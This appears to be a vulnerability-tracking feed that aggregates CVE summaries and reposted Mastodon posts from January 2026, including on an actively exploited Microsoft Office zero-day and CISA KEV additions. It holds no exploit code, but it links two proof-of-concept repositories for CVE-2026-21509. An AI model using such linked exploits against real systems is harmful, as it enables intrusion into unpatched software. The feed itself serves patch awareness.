CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability cve.org/CVERecord?id=CVE-2018- #CISA #Linux #infosec #vulnerability #GNU

##

CVE-2025-33234
(7.8 HIGH)

EPSS: 0.00%

updated 2026-01-27T18:32:29

4 posts

NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

AAKL at 2026-01-27T19:08:52.733Z ##

New advisory.

High severity NVIDIA runx vulnerability: CVE-2025-33234 nvidia.custhelp.com/app/answer

##

thehackerwire@mastodon.social at 2026-01-27T18:37:23.000Z ##

🟠 CVE-2025-33234 - High (7.8)

NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-01-27T19:08:52.000Z ##

New advisory.

High severity NVIDIA runx vulnerability: CVE-2025-33234 nvidia.custhelp.com/app/answer #Nvidia #vulnerability #infosec

##

thehackerwire@mastodon.social at 2026-01-27T18:37:23.000Z ##

🟠 CVE-2025-33234 - High (7.8)

NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23593
(7.5 HIGH)

EPSS: 0.00%

updated 2026-01-27T18:32:29

2 posts

A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affected directory.

thehackerwire@mastodon.social at 2026-01-27T18:37:04.000Z ##

🟠 CVE-2026-23593 - High (7.5)

A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affect...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T18:37:04.000Z ##

🟠 CVE-2026-23593 - High (7.5)

A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affect...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24874
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T18:32:28

4 posts

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

thehackerwire@mastodon.social at 2026-01-27T16:49:21.000Z ##

πŸ”΄ CVE-2026-24874 - Critical (9.1)

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:49.000Z ##

πŸ”΄ CVE-2026-24874 - Critical (9.1)

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:49:21.000Z ##

πŸ”΄ CVE-2026-24874 - Critical (9.1)

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:49.000Z ##

πŸ”΄ CVE-2026-24874 - Critical (9.1)

Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24873
(7.8 HIGH)

EPSS: 0.00%

updated 2026-01-27T18:32:28

2 posts

Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.

thehackerwire@mastodon.social at 2026-01-27T16:44:44.000Z ##

🟠 CVE-2026-24873 - High (7.8)

Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:44.000Z ##

🟠 CVE-2026-24873 - High (7.8)

Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24832
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T18:32:25

2 posts

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

thehackerwire@mastodon.social at 2026-01-27T16:30:23.000Z ##

πŸ”΄ CVE-2026-24832 - Critical (9.8)

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:30:23.000Z ##

πŸ”΄ CVE-2026-24832 - Critical (9.8)

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24831
(7.5 HIGH)

EPSS: 0.00%

updated 2026-01-27T18:32:16

4 posts

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

thehackerwire@mastodon.social at 2026-01-27T16:49:30.000Z ##

🟠 CVE-2026-24831 - High (7.5)

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:59.000Z ##

🟠 CVE-2026-24831 - High (7.5)

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:49:30.000Z ##

🟠 CVE-2026-24831 - High (7.5)

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:59.000Z ##

🟠 CVE-2026-24831 - High (7.5)

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22260
(7.5 HIGH)

EPSS: 0.00%

updated 2026-01-27T18:15:55.383000

2 posts

Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `response-body-limit`.

thehackerwire@mastodon.social at 2026-01-27T18:37:13.000Z ##

🟠 CVE-2026-22260 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `respo...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T18:37:13.000Z ##

🟠 CVE-2026-22260 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `respo...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23881
(7.7 HIGH)

EPSS: 0.00%

updated 2026-01-27T18:02:23

2 posts

## Summary Unbounded memory consumption in Kyverno's policy engine allows users with policy creation privileges to cause Denial of Serviceby crafting policies that exponentially amplify string data through context variables. ## Details For example, the `random()` JMESPath function in `pkg/engine/jmespath/functions.go` generates random strings. Combined with the `join()` function, an attacker ca

thehackerwire@mastodon.social at 2026-01-27T18:02:38.000Z ##

🟠 CVE-2026-23881 - High (7.7)

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T18:02:38.000Z ##

🟠 CVE-2026-23881 - High (7.7)

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24869
(8.1 HIGH)

EPSS: 0.00%

updated 2026-01-27T17:16:14.470000

2 posts

Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox < 147.0.2.

thehackerwire@mastodon.social at 2026-01-27T18:02:49.000Z ##

🟠 CVE-2026-24869 - High (8.1)

Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox &lt; 147.0.2.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T18:02:49.000Z ##

🟠 CVE-2026-24869 - High (8.1)

Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox &lt; 147.0.2.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22039
(9.9 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T17:16:12.097000

2 posts

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the Kyverno admission controller ServiceAccount, with no enforcement that the request is limited to the policy’s namespace. As a result, any authenticated use

thehackerwire@mastodon.social at 2026-01-27T18:00:43.000Z ##

πŸ”΄ CVE-2026-22039 - Critical (9.9)

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the K...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T18:00:43.000Z ##

πŸ”΄ CVE-2026-22039 - Critical (9.9)

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the K...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21509
(7.8 HIGH)

EPSS: 13.01%

updated 2026-01-27T16:19:42.330000

15 posts

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

2 repos

https://github.com/nicole2ilodl/CVE-2026-21509-PoC

https://github.com/Ashwesker/Ashwesker-CVE-2026-21509

cyberveille@mastobot.ping.moi at 2026-01-27T18:30:05.000Z ##

πŸ“’ Correctif d'urgence de Microsoft pour une zero‑day Office (CVE‑2026‑21509) activement exploitΓ©e
πŸ“ Source: BleepingComputer β€” Microsoft diffuse des mis...
πŸ“– cyberveille : cyberveille.ch/posts/2026-01-2
🌐 source : bleepingcomputer.com/news/micr
#CVE_2026_21509 #Microsoft_Office #Cyberveille

##

threatcodex at 2026-01-27T15:35:12.816Z ##

Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation

thehackernews.com/2026/01/micr

##

LLMs@activitypub.awakari.com at 2026-01-27T21:04:32.000Z ## Microsoft corrige de urgencia un 0-day de Office Microsoft ha publicado una actualizaciΓ³n de emergencia para corregir CVE-2026-21509, una vulnerabilidad en Microsoft Office que ya estΓ‘ siendo exp...

#Seguridad

Origin | Interest | Match ##

decio@infosec.exchange at 2026-01-27T14:24:01.000Z ##

[VULN] ⚠️"Une faille de Microsoft Office est activement exploitée par des pirates "

(NdR : cybercriminels et/ou opΓ©rateurs malveillants agissant pour le compte d’une entitΓ© soutenant les intΓ©rΓͺts gΓ©opolitiques d’un Γ‰tat)

"Microsoft alerte sur une nouvelle faille critique dans Office. DΓ©jΓ  exploitΓ©e par des cybercriminels, la vulnΓ©rabilitΓ© permet de dΓ©sactiver la sΓ©curitΓ© mise en place par Microsoft. L’éditeur a commencΓ© Γ  dΓ©ployer d’urgence un correctif pour Microsoft 365 et les versions rΓ©centes d’Office.

…

Pour protΓ©ger les internautes contre les attaques en cours, Microsoft a dΓ©ployΓ© une mise Γ  jour qui Β« corrige la vulnΓ©rabilitΓ© qui contourne les mesures d’attΓ©nuation Β» d’Office. Les utilisateurs de Microsoft 365 et Microsoft Office sont invitΓ©s Γ  installer le correctif sans tarder.

Les utilisateurs d’Office 2021 et des versions ultΓ©rieures Β« seront automatiquement protΓ©gΓ©s grΓ’ce Γ  une modification cΓ΄tΓ© serveur, mais devront redΓ©marrer leurs applications Office pour que cette modification prenne effet Β». Il n’y a donc rien Γ  faire, sauf redΓ©marrer vos applications. Enfin, Microsoft n’a pas encore corrigΓ© le tir sur Office 2016 et 2019. En attendant un correctif, Microsoft propose des mesures d’attΓ©nuation Γ  ses utilisateurs."
πŸ‘‡
01net.com/actualites/faille-mi

πŸ”¬
⬇️
vulnerability.circl.lu/vuln/CV

πŸ“œ
⬇️
msrc.microsoft.com/update-guid

πŸ’¬
⬇️
infosec.pub/post/41135178

#CyberVeille #Microsoft #CVE_2026_21509

##

patrickcmiller@infosec.exchange at 2026-01-27T12:42:00.000Z ##

Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation thehackernews.com/2026/01/micr

##

jbhall56@infosec.exchange at 2026-01-27T12:36:19.000Z ##

The vulnerability, tracked as CVE-2026-21509, carries a CVSS score of 7.8 out of 10.0. It has been described as a security feature bypass in Microsoft Office. thehackernews.com/2026/01/micr

##

sambowne@infosec.exchange at 2026-01-27T11:42:39.000Z ##

Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation

thehackernews.com/2026/01/micr

##

benzogaga33@mamot.fr at 2026-01-27T10:40:02.000Z ##

Microsoft a patchΓ© en urgence une faille de sΓ©curitΓ© zero-day dans Office : CVE-2026-21509 it-connect.fr/microsoft-office #ActuCybersΓ©curitΓ© #CybersΓ©curitΓ© #VulnΓ©rabilitΓ© #Microsoft #Office

##

beyondmachines1@infosec.exchange at 2026-01-27T09:01:02.000Z ##

Microsoft Issues Emergency Patch for Actively Exploited Office Zero-Day

Microsoft released emergency updates for an actively exploited Office zero-day (CVE-2026-21509) that allows attackers to bypass OLE security protections when a user opens a malicious file.

**For everyone using Microsoft Office, this is important and urgent. Hackers attack with malicious MS Office documents. Restart all Microsoft 365 and Office 2021 applications immediately to trigger the service-side security fix. For older versions like Office 2016, apply registry workarounds until Microsoft releases a formal patch.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

teezeh@ieji.de at 2026-01-27T08:31:49.000Z ##

β€žIn Office 2016 bis Office 2024 (auch LTSC), sowie die Microsoft 365 Apps fΓΌr Unternehmen steckt eine SicherheitslΓΌcke, die aktiv ausgenutzt wird.β€œ

deskmodder.de/blog/2026/01/27/

##

DarkWebInformer@infosec.exchange at 2026-01-27T00:27:16.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

##

cisakevtracker@mastodon.social at 2026-01-26T22:01:16.000Z ##

CVE ID: CVE-2026-21509
Vendor: Microsoft
Product: Office
Date Added: 2026-01-26
Notes: Please adhere to Microsoft’s recommended guidelines to address this vulnerability. Implement all final mitigations provided by the vendor for Office 2021, and apply the interim corresponding mitigations for Office 2016 and Office 2019 until the final patch becomes available. For more information please see: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-01-26T18:32:59.000Z ##

‼️ CVE-2026-21509: Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally

β–ͺ️Zero Day: Yes; Actively exploited
β–ͺ️CVSS: 7.8
β–ͺ️CVE Published: Today, January 26th, 2026

Advisory: msrc.microsoft.com/update-guid

Affected Products:

β–ͺ️Microsoft Office 2016 (64-bit edition)
β–ͺ️Microsoft Office 2016 (32-bit edition)
β–ͺ️Microsoft Office LTSC 2024 for 64-bit editions
β–ͺ️Microsoft Office LTSC 2024 for 32-bit editions
β–ͺ️Microsoft Office LTSC 2021 for 32-bit editions
β–ͺ️Microsoft Office LTSC 2021 for 64-bit editions
β–ͺ️Microsoft 365 Apps for Enterprise for 64-bit Systems
β–ͺ️Microsoft 365 Apps for Enterprise for 32-bit Systems
β–ͺ️Microsoft Office 2019 for 64-bit editions
β–ͺ️Microsoft Office 2019 for 32-bit editions

##

thehackerwire@mastodon.social at 2026-01-26T18:17:51.000Z ##

🟠 CVE-2026-21509 - High (7.8)

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

campuscodi@mastodon.social at 2026-01-26T18:08:44.000Z ##

Microsoft releases emergency patch for an Office zero-day

msrc.microsoft.com/update-guid

##

CVE-2026-24875
(7.8 HIGH)

EPSS: 0.00%

updated 2026-01-27T16:16:37.013000

2 posts

Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.

thehackerwire@mastodon.social at 2026-01-27T16:30:13.000Z ##

🟠 CVE-2026-24875 - High (7.8)

Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:30:13.000Z ##

🟠 CVE-2026-24875 - High (7.8)

Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24872
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T16:16:36.640000

2 posts

improper pointer arithmetic vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.

thehackerwire@mastodon.social at 2026-01-27T16:30:34.000Z ##

πŸ”΄ CVE-2026-24872 - Critical (9.8)

improper pointer arithmetic

vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:30:34.000Z ##

πŸ”΄ CVE-2026-24872 - Critical (9.8)

improper pointer arithmetic

vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-68670
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T16:16:16.037000

2 posts

xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If exploited, the vulnerability could allow remote attackers to execute arbitrary code on the target system. The vulnerability allows an attacker to overwri

thehackerwire@mastodon.social at 2026-01-27T16:45:02.000Z ##

πŸ”΄ CVE-2025-68670 - Critical (9.1)

xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:45:02.000Z ##

πŸ”΄ CVE-2025-68670 - Critical (9.1)

xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1470
(10.0 CRITICAL)

EPSS: 0.00%

updated 2026-01-27T15:30:38

1 posts

n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow Expression evaluation system. Expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime. An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T15:22:28.000Z ##

πŸ”΄ CVE-2026-1470 - Critical (9.9)

n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow Expression evaluation system. Expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficie...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21720
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-27T15:30:30

1 posts

Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine blocks forever trying to send on an unbuffered channel. Sustained traffic with random hashes keeps tripping this timeout, so goroutine count grows linearly, e

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T10:00:28.000Z ##

🟠 CVE-2026-21720 - High (7.5)

Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine block...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-52691
(10.0 CRITICAL)

EPSS: 79.25%

updated 2026-01-27T15:28:07.247000

3 posts

Successful exploitation of the vulnerability could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution.

Nuclei template

1 repos

#search_error

DarkWebInformer@infosec.exchange at 2026-01-27T00:27:16.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

##

cisakevtracker@mastodon.social at 2026-01-26T21:01:22.000Z ##

CVE ID: CVE-2025-52691
Vendor: SmarterTools
Product: SmarterMail
Date Added: 2026-01-26
Notes: smartertools.com/smartermail/r ; csa.gov.sg/alerts-and-advisori ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2026-01-26T20:03:53.000Z ##

CISA has updated the KEV catalogue.

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2025-

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability cve.org/CVERecord?id=CVE-2018- #CISA #Linux #infosec #vulnerability #GNU

##

CVE-2025-41727
(7.8 HIGH)

EPSS: 0.02%

updated 2026-01-27T14:59:34.073000

1 posts

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

thehackerwire@mastodon.social at 2026-01-27T12:45:59.000Z ##

🟠 CVE-2025-41727 - High (7.8)

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24828
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-27T14:59:34.073000

1 posts

Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is-Engine.This issue affects is-Engine: before 3.3.4.

thehackerwire@mastodon.social at 2026-01-27T10:27:15.000Z ##

🟠 CVE-2026-24828 - High (7.5)

Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is-Engine.This issue affects is-Engine: before 3.3.4.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24830
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-27T14:59:34.073000

1 posts

Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects IronOS: before v2.23-rc2.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T10:26:56.000Z ##

πŸ”΄ CVE-2026-24830 - Critical (9.8)

Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects IronOS: before v2.23-rc2.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21721
(8.1 HIGH)

EPSS: 0.03%

updated 2026-01-27T14:59:34.073000

1 posts

The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization‑internal privilege escalation.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-27T10:00:37.000Z ##

🟠 CVE-2026-21721 - High (8.1)

The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashbo...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24470
(8.1 HIGH)

EPSS: 0.02%

updated 2026-01-27T14:59:34.073000

1 posts

Skipper is an HTTP router and reverse proxy for service composition. Prior to version 0.24.0, when running Skipper as an Ingress controller, users with permissions to create an Ingress and a Service of type ExternalName can create routes that enable them to use Skipper's network access to reach internal services. Version 0.24.0 disables Kubernetes ExternalName by default. As a workaround, develope

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-26T23:59:57.000Z ##

🟠 CVE-2026-24470 - High (8.1)

Skipper is an HTTP router and reverse proxy for service composition. Prior to version 0.24.0, when running Skipper as an Ingress controller, users with permissions to create an Ingress and a Service of type ExternalName can create routes that enab...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-14459
(8.5 HIGH)

EPSS: 0.01%

updated 2026-01-27T14:59:34.073000

1 posts

A flaw was found in KubeVirt Containerized Data Importer (CDI). This vulnerability allows a user to clone PersistentVolumeClaims (PVCs) from unauthorized namespaces, resulting in unauthorized access to data via the DataImportCron PVC source mechanism.

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-26T21:00:21.000Z ##

🟠 CVE-2025-14459 - High (8.5)

A flaw was found in KubeVirt Containerized Data Importer (CDI). This vulnerability allows a user to clone PersistentVolumeClaims (PVCs) from unauthorized namespaces, resulting in unauthorized access to data via the DataImportCron PVC source mechan...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-41726
(8.8 HIGH)

EPSS: 0.18%

updated 2026-01-27T12:31:24

1 posts

